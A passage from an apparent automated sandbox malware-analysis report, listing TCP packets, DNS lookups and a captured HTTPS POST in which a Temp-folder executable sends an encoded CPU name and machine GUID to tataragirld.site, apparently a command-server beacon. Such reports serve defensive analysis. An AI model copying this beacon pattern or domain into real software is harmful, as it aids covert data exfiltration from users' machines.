                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.191745043 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.198326111 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.198338985 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.198349953 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.198580980 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.204920053 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.301664114 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.307822943 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.307848930 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.307859898 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.308130980 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.314946890 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.411178112 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.417244911 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.417278051 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.417289972 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.417591095 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.417649984 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.417684078 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.423945904 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.571724892 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.577579975 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.577619076 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.577637911 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.577840090 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.585736036 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.688843966 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.693468094 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.693505049 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.693516970 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.693526030 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.693798065 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.693850994 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.693891048 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.700637102 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.796865940 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.801127911 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.801162958 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.801179886 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.801419973 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.814050913 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.913292885 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.918068886 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.918215036 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.918227911 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.918279886 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.918335915 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.918370008 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:27.927615881 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:28.023720980 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:28.028153896 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:28.028166056 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:28.028193951 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:28.028599977 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:28.035423040 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:28.131612062 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:28.138082981 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:28.138101101 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:28.138111115 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:28.138596058 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:28.146745920 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:28.243134022 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:28.250317097 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:28.250329018 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:28.250338078 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:28.250597000 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:28.268521070 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:28.365020037 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:28.370636940 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:28.370671034 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:28.370681047 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:28.372405052 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:28.392966986 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:28.489938974 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:28.499176979 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:28.499188900 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:28.499208927 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:28.499872923 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:28.510031939 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:28.607064009 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:28.617245913 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:28.617278099 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:28.617290974 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:28.624766111 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:28.674392939 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:28.675898075 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:28.744035959 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:28.761451960 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:28.763216972 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:28.771950960 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:28.774771929 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:28.776563883 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:28.776742935 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:28.776972055 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:28.776972055 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:28.777034044 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:28.793122053 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:28.889357090 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:28.895679951 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:28.895778894 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:28.895792007 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:28.895827055 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:28.895981073 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:28.936996937 CET49323443192.168.2.723.216.132.32
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:29.015183926 CET4434932323.216.132.32192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:20:07.795375109 CET53371443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:20:07.795490026 CET53371443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:20:07.795689106 CET53371443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:20:07.795799971 CET53371443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:20:08.251262903 CET44353371172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:20:08.252124071 CET53371443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:20:08.283142090 CET53371443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:20:08.346051931 CET44353371172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:20:08.346064091 CET44353371172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:20:08.346090078 CET44353371172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:20:08.346100092 CET44353371172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:20:08.346461058 CET53371443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:20:08.346524000 CET53371443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:20:08.440377951 CET44353371172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:20:08.440711021 CET53371443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:20:08.536026001 CET44353371172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:20:08.536135912 CET44353371172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:20:08.536729097 CET44353371172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:20:08.536933899 CET53371443192.168.2.7172.64.41.3

                                                                                                                                                                                                                                                                                                DNS Queries

                                                                                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:08.286711931 CET192.168.2.71.1.1.10xb664Standard query (0)time.windows.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:54.632966995 CET192.168.2.71.1.1.10xff0eStandard query (0)tataragirld.siteA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:04.053396940 CET192.168.2.71.1.1.10xe8b6Standard query (0)ntp.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:04.053767920 CET192.168.2.71.1.1.10x5b5bStandard query (0)ntp.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:05.486486912 CET192.168.2.71.1.1.10xad8bStandard query (0)bzib.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:05.486867905 CET192.168.2.71.1.1.10xa3a9Standard query (0)bzib.nelreports.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:06.490081072 CET192.168.2.71.1.1.10xd2d3Standard query (0)sb.scorecardresearch.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:06.490196943 CET192.168.2.71.1.1.10x82beStandard query (0)sb.scorecardresearch.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:06.520065069 CET192.168.2.71.1.1.10x461fStandard query (0)assets.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:06.520251036 CET192.168.2.71.1.1.10xaac2Standard query (0)assets.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:06.520904064 CET192.168.2.71.1.1.10xa55fStandard query (0)c.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:06.521083117 CET192.168.2.71.1.1.10xe2c7Standard query (0)c.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:06.549071074 CET192.168.2.71.1.1.10x490fStandard query (0)api.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:06.549328089 CET192.168.2.71.1.1.10x77a3Standard query (0)api.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:09.145632029 CET192.168.2.71.1.1.10x6914Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:09.145824909 CET192.168.2.71.1.1.10x27dbStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:09.146384001 CET192.168.2.71.1.1.10x2465Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:09.146531105 CET192.168.2.71.1.1.10x6ac1Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:09.224621058 CET192.168.2.71.1.1.10x679Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:09.224797964 CET192.168.2.71.1.1.10x2891Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:09.415112972 CET192.168.2.71.1.1.10xfdebStandard query (0)clients2.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:09.415838957 CET192.168.2.71.1.1.10xd92bStandard query (0)clients2.googleusercontent.com65IN (0x0001)false

                                                                                                                                                                                                                                                                                                DNS Answers

                                                                                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:08.293335915 CET1.1.1.1192.168.2.70xb664No error (0)time.windows.comtwc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:54.646543026 CET1.1.1.1192.168.2.70xff0eNo error (0)tataragirld.site188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:18:54.646543026 CET1.1.1.1192.168.2.70xff0eNo error (0)tataragirld.site188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:04.059981108 CET1.1.1.1192.168.2.70xe8b6No error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:04.060951948 CET1.1.1.1192.168.2.70x5b5bNo error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:04.550748110 CET1.1.1.1192.168.2.70x784dNo error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:04.551103115 CET1.1.1.1192.168.2.70x6d05No error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:04.551103115 CET1.1.1.1192.168.2.70x6d05No error (0)ssl.bingadsedgeextension-prod-europe.azurewebsites.net94.245.104.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:05.493421078 CET1.1.1.1192.168.2.70xa3a9No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:05.493906975 CET1.1.1.1192.168.2.70xad8bNo error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:06.496701002 CET1.1.1.1192.168.2.70xd2d3No error (0)sb.scorecardresearch.com18.244.18.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:06.496701002 CET1.1.1.1192.168.2.70xd2d3No error (0)sb.scorecardresearch.com18.244.18.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:06.496701002 CET1.1.1.1192.168.2.70xd2d3No error (0)sb.scorecardresearch.com18.244.18.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:06.496701002 CET1.1.1.1192.168.2.70xd2d3No error (0)sb.scorecardresearch.com18.244.18.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:06.526693106 CET1.1.1.1192.168.2.70x461fNo error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:06.527096987 CET1.1.1.1192.168.2.70xaac2No error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:06.527467012 CET1.1.1.1192.168.2.70xa55fNo error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:06.528270006 CET1.1.1.1192.168.2.70xe2c7No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:06.555598021 CET1.1.1.1192.168.2.70x490fNo error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:06.555927038 CET1.1.1.1192.168.2.70x77a3No error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:09.152194977 CET1.1.1.1192.168.2.70x6914No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:09.152194977 CET1.1.1.1192.168.2.70x6914No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:09.152590990 CET1.1.1.1192.168.2.70x27dbNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:09.153218031 CET1.1.1.1192.168.2.70x6ac1No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:09.153625011 CET1.1.1.1192.168.2.70x2465No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:09.153625011 CET1.1.1.1192.168.2.70x2465No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:09.232505083 CET1.1.1.1192.168.2.70x2891No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:09.232522011 CET1.1.1.1192.168.2.70x679No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:09.232522011 CET1.1.1.1192.168.2.70x679No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:09.421813011 CET1.1.1.1192.168.2.70xfdebNo error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:09.421813011 CET1.1.1.1192.168.2.70xfdebNo error (0)googlehosted.l.googleusercontent.com142.250.185.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                Jan 7, 2025 13:19:09.423604965 CET1.1.1.1192.168.2.70xd92bNo error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false

                                                                                                                                                                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                                                                                                                                                                • tataragirld.site
                                                                                                                                                                                                                                                                                                • chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                • clients2.googleusercontent.com
                                                                                                                                                                                                                                                                                                • https:
                                                                                                                                                                                                                                                                                                  • sb.scorecardresearch.com
                                                                                                                                                                                                                                                                                                  • browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                  • c.msn.com

                                                                                                                                                                                                                                                                                                HTTPS Proxied Packets

                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                0192.168.2.749967188.114.97.34431532C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2025-01-07 12:18:55 UTC391OUTPOST /2009_New_England_Patriots_season?omlxpbik85mer=%2BBA7Gis1n3XVmJgLCG%2BgLgGVQ1E79NkVzyEnWTmwcxfStdd4il28zJlLoAzjvUO%2BK%2B3IAZfOMRKWTcb%2Fuzy%2FRA%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0
                                                                                                                                                                                                                                                                                                Content-Length: 147
                                                                                                                                                                                                                                                                                                Host: tataragirld.site
                                                                                                                                                                                                                                                                                                2025-01-07 12:18:55 UTC147OUTData Raw: 03 00 00 00 fd ff ff ff 00 00 00 00 00 00 00 00 92 00 00 60 00 00 00 fe ff ff ff 00 00 00 00 00 00 00 00 97 00 a0 d9 26 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a a0 ce 64 8f 02 20 cf 01 d9 f5 d7 9d 1e 13 ec d9 24 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                                                                                                                                                Data Ascii: `&Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzd $9e146be9-c76a-4720-bcdb-53011b87bd06
                                                                                                                                                                                                                                                                                                2025-01-07 12:18:55 UTC856INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Date: Tue, 07 Jan 2025 12:18:55 GMT
                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                ontent: DixBvHnlcM48PxLEc7IjwhmUek35rWnNFExDdZ/M9Mft+Zrs5gy+OkNPDkoJDBS1rnOJb3cy5rolkjMpj17XEomZYCIlqHEt59N5hw
                                                                                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WxI8UgTRXKZ2G47RjokApNBvmTNpJTio6Np2ssabmvQwn0cwad8VWuzPvKdbF0AYWC73%2FzOf01SFCBzZHae6XFLfsrObkUuOaHk9ooptATzA7sWxEp5XIhzaXzX7ClabS6V%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                CF-RAY: 8fe3e4a74cdd424a-EWR
                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2179&min_rtt=2170&rtt_var=833&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1174&delivery_rate=1298354&cwnd=252&unsent_bytes=0&cid=6bf5afef8ab54d13&ts=592&x=0"
